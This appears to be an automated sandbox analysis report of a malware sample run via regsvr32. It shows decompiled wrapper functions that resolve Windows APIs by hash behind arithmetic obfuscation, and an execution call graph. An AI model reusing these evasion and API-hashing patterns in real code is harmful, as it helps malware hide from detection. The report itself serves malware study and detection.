                                                                                                                0x001d4703
                                                                                                                0x001d4706
                                                                                                                0x001d4709
                                                                                                                0x001d470c
                                                                                                                0x001d470d
                                                                                                                0x001d4710
                                                                                                                0x001d4713
                                                                                                                0x001d4716
                                                                                                                0x001d4717
                                                                                                                0x001d4719
                                                                                                                0x001d471e
                                                                                                                0x001d4727
                                                                                                                0x001d472e
                                                                                                                0x001d4732
                                                                                                                0x001d4739
                                                                                                                0x001d4740
                                                                                                                0x001d4747
                                                                                                                0x001d474e
                                                                                                                0x001d4755
                                                                                                                0x001d475c
                                                                                                                0x001d4763
                                                                                                                0x001d476a
                                                                                                                0x001d4771
                                                                                                                0x001d477d
                                                                                                                0x001d4783
                                                                                                                0x001d4786
                                                                                                                0x001d478d
                                                                                                                0x001d47ae
                                                                                                                0x001d47ca
                                                                                                                0x001d47d1

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 001D47CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: 4936a3113a62e86c986a9f4c3d14ffed618cffda102498af4d541170974e467e
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: FD31F472900248FBDF559F95CD09CDEBF75FB89314F008148FA2462120D7769A64DF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001DBF1C Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E001DBF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C9E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E001DBFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}










                                                                                                                0x001dbf24
                                                                                                                0x001dbf29
                                                                                                                0x001dbf2b
                                                                                                                0x001dbf2e
                                                                                                                0x001dbf2f
                                                                                                                0x001dbf30
                                                                                                                0x001dbf33
                                                                                                                0x001dbf36
                                                                                                                0x001dbf39
                                                                                                                0x001dbf3c
                                                                                                                0x001dbf3f
                                                                                                                0x001dbf42
                                                                                                                0x001dbf43
                                                                                                                0x001dbf44
                                                                                                                0x001dbf49
                                                                                                                0x001dbf53
                                                                                                                0x001dbf5a
                                                                                                                0x001dbf61
                                                                                                                0x001dbf68
                                                                                                                0x001dbf6c
                                                                                                                0x001dbf70
                                                                                                                0x001dbf77
                                                                                                                0x001dbf7e
                                                                                                                0x001dbf85
                                                                                                                0x001dbf9c
                                                                                                                0x001dbfa4
                                                                                                                0x001dbfab
                                                                                                                0x001dbfb2
                                                                                                                0x001dbfb6
                                                                                                                0x001dbfba
                                                                                                                0x001dbfbe
                                                                                                                0x001dbfd1
                                                                                                                0x001dbfe8
                                                                                                                0x001dbfef

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 001DBFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: d6e02314348e3f6b62ba4a6f64c5aed65758f746397e4812196ecaad889f2e08
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: 9821E57680020DBBCF15DF96D9498DFBFB5FB94748F108198F925A2220D3B68A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001D1B22 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E001D1B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C9E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E001DBFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}












                                                                                                                0x001d1b2a
                                                                                                                0x001d1b2d
                                                                                                                0x001d1b2f
                                                                                                                0x001d1b31
                                                                                                                0x001d1b34
                                                                                                                0x001d1b37
                                                                                                                0x001d1b3a
                                                                                                                0x001d1b3b
                                                                                                                0x001d1b3c
                                                                                                                0x001d1b41
                                                                                                                0x001d1b50
                                                                                                                0x001d1b54
                                                                                                                0x001d1b61
                                                                                                                0x001d1b64
                                                                                                                0x001d1b6b
                                                                                                                0x001d1b72
                                                                                                                0x001d1b79
                                                                                                                0x001d1b7d
                                                                                                                0x001d1b84
                                                                                                                0x001d1b8b
                                                                                                                0x001d1b92
                                                                                                                0x001d1b99
                                                                                                                0x001d1ba0
                                                                                                                0x001d1ba7
                                                                                                                0x001d1bae
                                                                                                                0x001d1bc2
                                                                                                                0x001d1bc5
                                                                                                                0x001d1bd8
                                                                                                                0x001d1be5
                                                                                                                0x001d1bec

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 001D1BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: f36a3a244b2309d5f21753a9031a69c2070bcca4305d62a24e02a1514cf82a64
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: 462133B5D00208FBDF05DFA5C94A8EEBFB5FB80314F108089E815A6261D3B49B41DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001D66C2 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001D66C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E001C9E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E001DBFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}











                                                                                                                0x001d66cf
                                                                                                                0x001d66e4
                                                                                                                0x001d66e9
                                                                                                                0x001d66f3
                                                                                                                0x001d66f7
                                                                                                                0x001d66fe
                                                                                                                0x001d6705
                                                                                                                0x001d670c
                                                                                                                0x001d6710
                                                                                                                0x001d6717
                                                                                                                0x001d671e
                                                                                                                0x001d6725
                                                                                                                0x001d6729
                                                                                                                0x001d672d
                                                                                                                0x001d6734
                                                                                                                0x001d673b
                                                                                                                0x001d6742
                                                                                                                0x001d6766
                                                                                                                0x001d6777
                                                                                                                0x001d677e

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 001D6777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: 2940929c4726bbdfa5c9a01ffb72d7b4588a24e25f64d4e4a3234e7bb3c68189
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: 811142B2800208FBCF15DFA5CC0A8DEBFB8EF95304F108198E92962210D3B18A64DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001CFCB5 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001CFCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E001C9E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E001DBFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}












                                                                                                                0x001cfcbc
                                                                                                                0x001cfcbf
                                                                                                                0x001cfcc1
                                                                                                                0x001cfcc3
                                                                                                                0x001cfcc8
                                                                                                                0x001cfcd6
                                                                                                                0x001cfcdb
                                                                                                                0x001cfce0
                                                                                                                0x001cfce7
                                                                                                                0x001cfcee
                                                                                                                0x001cfcf5
                                                                                                                0x001cfcfc
                                                                                                                0x001cfd03
                                                                                                                0x001cfd0d
                                                                                                                0x001cfd13
                                                                                                                0x001cfd16
                                                                                                                0x001cfd1d
                                                                                                                0x001cfd24
                                                                                                                0x001cfd2b
                                                                                                                0x001cfd4f
                                                                                                                0x001cfd58
                                                                                                                0x001cfd5e

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 001CFD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction ID: 55729e21d3cecfe32f31517a1eb5f19200a575a7e1e6698b54bfa5e47d070045
                                                                                                                • Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction Fuzzy Hash: 91112E71D00218EBDB18DFA5C84A9EEBBB5EB54304F10818DE429A6251DBB56B148B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C9EA8 Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E001C9EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E001C9E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E001DBFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}










                                                                                                                0x001c9eaf
                                                                                                                0x001c9eb2
                                                                                                                0x001c9eb4
                                                                                                                0x001c9eb8
                                                                                                                0x001c9eb9
                                                                                                                0x001c9ebe
                                                                                                                0x001c9ec8
                                                                                                                0x001c9ecf
                                                                                                                0x001c9ed6
                                                                                                                0x001c9edd
                                                                                                                0x001c9ee1
                                                                                                                0x001c9ee5
                                                                                                                0x001c9eec
                                                                                                                0x001c9ef3
                                                                                                                0x001c9efa
                                                                                                                0x001c9f01
                                                                                                                0x001c9f08
                                                                                                                0x001c9f0f
                                                                                                                0x001c9f16
                                                                                                                0x001c9f1d
                                                                                                                0x001c9f24
                                                                                                                0x001c9f48
                                                                                                                0x001c9f51
                                                                                                                0x001c9f57

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 001C9F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction ID: df88304f72e88659d72038128dcc4a8252d52ad3e807021de4252f5897a8c976
                                                                                                                • Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction Fuzzy Hash: 91111CB1C11619EBDF44DFA4D94A8DEBBB4EF10318F108288E81566250E7B45B548F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001CBA9C Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001CBA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E001DBFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}








                                                                                                                0x001cbaa2
                                                                                                                0x001cbaa9
                                                                                                                0x001cbaad
                                                                                                                0x001cbab4
                                                                                                                0x001cbabb
                                                                                                                0x001cbabf
                                                                                                                0x001cbac6
                                                                                                                0x001cbacd
                                                                                                                0x001cbad4
                                                                                                                0x001cbadb
                                                                                                                0x001cbae6
                                                                                                                0x001cbaee
                                                                                                                0x001cbaf6
                                                                                                                0x001cbafa
                                                                                                                0x001cbb12
                                                                                                                0x001cbb1d

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 001CBB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction ID: ad4fe31e44f2f147f4571028d1287f25956e8f4b9aec610fc4282be674a8133f
                                                                                                                • Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction Fuzzy Hash: 57010475D1120CEB8B04DFA4CA4A9DEBBB4FB04348F108599E821B7211D7B55B04CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1055
                                                                                                                Total number of Limit Nodes:16
                                                                                                                execution_graph 5119 4788e5 5120 478a5e 5119->5120 5121 48e18b 2 API calls 5120->5121 5126 478aa9 5120->5126 5122 478a79 5121->5122 5127 4808c0 5122->5127 5125 47b9d7 GetPEB 5125->5126 5130 4808e5 5127->5130 5128 478a91 5128->5125 5130->5128 5131 4819a4 5130->5131 5132 4819bd 5131->5132 5133 48bff0 GetPEB 5132->5133 5134 481a63 5133->5134 5134->5130 3845 4863f0 3846 48641e 3845->3846 3855 47b184 3846->3855 3850 486676 3854 486683 3850->3854 3863 48e373 3850->3863 3852 4866a3 3853 48e373 2 API calls 3852->3853 3853->3854 3856 47b19a 3855->3856 3867 48c0df 3856->3867 3859 4846e0 3860 48471e 3859->3860 3861 48bff0 GetPEB 3860->3861 3862 4847b3 CreateProcessW 3861->3862 3862->3850 3864 48e389 3863->3864 3865 48bff0 GetPEB 3864->3865 3866 48e42b CloseHandle 3865->3866 3866->3852 3868 48c0fa 3867->3868 3871 48e0ca 3868->3871 3872 48e0e7 3871->3872 3875 48bff0 3872->3875 3876 47b1f9 3875->3876 3877 48c0a6 3875->3877 3876->3859 3881 491ae9 3877->3881 3879 48c0ba 3884 48b558 3879->3884 3888 48aa52 GetPEB 3881->3888 3883 491b98 3883->3879 3886 48b575 3884->3886 3885 48b64f 3885->3876 3886->3885 3889 48b384 3886->3889 3888->3883 3890 48b4de 3889->3890 3897 48e545 3890->3897 3893 48b520 3895 48b54f 3893->3895 3896 48b558 GetPEB 3893->3896 3895->3885 3896->3895 3898 48e558 3897->3898 3899 48bff0 GetPEB 3898->3899 3900 48b506 3899->3900 3900->3893 3901 48e9a4 3900->3901 3902 48e9b4 3901->3902 3903 48bff0 GetPEB 3902->3903 3904 48ea43 3903->3904 3904->3893 5081 4772cc 5082 47ffde GetPEB 5081->5082 5083 47750d 5082->5083 5094 48589f 5083->5094 5086 474bb4 2 API calls 5087 47753e 5086->5087 5088 48734a GetPEB 5087->5088 5089 477568 5088->5089 5090 47b9d7 GetPEB 5089->5090 5091 477577 5090->5091 5092 479ea8 2 API calls 5091->5092 5093 47758b 5092->5093 5095 4858b2 5094->5095 5096 48bff0 GetPEB 5095->5096 5097 477520 5096->5097 5097->5086 5097->5093 5098 475c9a 5108 47617c 5098->5108 5099 476a8d GetPEB 5099->5108 5100 48bf1c 2 API calls 5100->5108 5101 479574 GetPEB 5101->5108 5102 47638d 5103 47638f 5105 48e373 2 API calls 5103->5105 5105->5102 5106 47ffde GetPEB 5106->5108 5107 48eaa3 2 API calls 5107->5108 5108->5099 5108->5100 5108->5101 5108->5102 5108->5103 5108->5106 5108->5107 5109 48589f GetPEB 5108->5109 5111 48ab39 5108->5111 5115 492727 5108->5115 5109->5108 5112 48ab6c 5111->5112 5113 48bff0 GetPEB 5112->5113 5114 48ac10 5113->5114 5114->5108 5116 492737 5115->5116 5117 48bff0 GetPEB 5116->5117 5118 4927d3 5117->5118 5118->5108 3905 47e1a9 3910 481fd0 3905->3910 3907 47e295 3947 47ba9c 3907->3947 3909 47e2ab 3927 4833d3 3910->3927 3913 47e080 RtlAllocateHeap GetPEB 3913->3927 3914 483cc9 4160 478c7c 3914->4160 3919 48acff RtlAllocateHeap GetPEB 3919->3927 3927->3913 3927->3914 3927->3919 3929 483cb3 3927->3929 3932 476a8d GetPEB 3927->3932 3937 483ca3 3927->3937 3946 47b9d7 GetPEB 3927->3946 3950 480418 3927->3950 3960 48d14c 3927->3960 3974 47b4fc 3927->3974 3981 474700 3927->3981 3991 476cbb 3927->3991 4003 47be09 3927->4003 4014 4766b0 3927->4014 4022 48882f 3927->4022 4035 48158a 3927->4035 4039 485497 3927->4039 4046 47da93 3927->4046 4050 474cb9 3927->4050 4054 48d6b1 3927->4054 4062 48afb0 3927->4062 4071 48e612 3927->4071 4077 48519b 3927->4077 4080 48ec9b 3927->4080 4086 48c535 3927->4086 4097 471b09 3927->4097 4107 48eba2 3927->4107 4112 48dad8 3927->4112 4116 48b2fc 3927->4116 4119 48baf2 3927->4119 4130 4730be 3927->4130 4135 48c16b 3927->4135 4145 475995 3927->4145 4150 47c7d1 3929->4150 3932->3927 3937->3907 3946->3927 3948 48bff0 GetPEB 3947->3948 3949 47bb17 ExitProcess 3948->3949 3949->3909 3956 48073f 3950->3956 3953 480871 4197 479574 3953->4197 3956->3953 3958 48086f 3956->3958 4174 48a98e 3956->4174 4178 4866c2 3956->4178 4182 4732b5 3956->4182 4186 474e77 3956->4186 4192 48eaa3 3956->4192 3958->3927 3973 48d4fd 3960->3973 3963 48d67f 4240 476a8d 3963->4240 3966 48d538 4232 47d5cb 3966->4232 3967 48eaa3 RtlAllocateHeap GetPEB 3967->3973 3968 48d557 3968->3927 3971 476a8d GetPEB 3971->3968 3973->3963 3973->3966 3973->3967 3973->3968 4220 474bb4 3973->4220 4224 47d68b 3973->4224 4228 47c706 3973->4228 4236 47b9d7 3973->4236 3979 47b7a3 3974->3979 3975 48a98e CloseServiceHandle GetPEB 3975->3979 3976 4732b5 2 API calls 3976->3979 3977 47b8ea 3977->3927 3979->3975 3979->3976 3979->3977 4250 47c4eb 3979->4250 4254 481070 3979->4254 3982 4749df 3981->3982 3983 479574 GetPEB 3982->3983 3984 474bb4 2 API calls 3982->3984 3986 474a0b 3982->3986 3989 474a21 3982->3989 3990 47b9d7 GetPEB 3982->3990 4268 49110e 3982->4268 4282 48734a 3982->4282 3983->3982 3984->3982 4258 47d346 3986->4258 3989->3927 3990->3982 4301 47588d 3991->4301 3993 4770ab 3994 477204 3993->3994 3995 474bb4 RtlAllocateHeap GetPEB 3993->3995 3996 4770da 3993->3996 3999 48734a GetPEB 3993->3999 4002 47b9d7 GetPEB 3993->4002 4304 47f2b9 3993->4304 4307 481bed 3993->4307 3994->3994 3995->3993 3998 49110e 2 API calls 3996->3998 4000 4770fb 3998->4000 3999->3993 4000->3927 4002->3993 4008 47c23f 4003->4008 4005 474bb4 2 API calls 4005->4008 4006 47c431 4007 48e373 2 API calls 4006->4007 4011 47c42f 4007->4011 4008->4005 4008->4006 4009 48734a GetPEB 4008->4009 4008->4011 4013 47b9d7 GetPEB 4008->4013 4311 47f1d5 4008->4311 4315 48bf1c 4008->4315 4319 4818f7 4008->4319 4009->4008 4011->3927 4013->4008 4015 476937 4014->4015 4016 48bf1c 2 API calls 4015->4016 4017 476a80 4015->4017 4019 479574 GetPEB 4015->4019 4020 4818f7 GetPEB 4015->4020 4021 48e373 2 API calls 4015->4021 4323 48ba34 4015->4323 4016->4015 4017->3927 4019->4015 4020->4015 4021->4015 4033 488f07 4022->4033 4024 48915b 4027 48a98e 2 API calls 4024->4027 4025 4866c2 2 API calls 4025->4033 4026 4732b5 2 API calls 4026->4033 4028 489159 4027->4028 4028->3927 4029 48a98e 2 API calls 4029->4033 4030 474bb4 2 API calls 4030->4033 4032 481bed 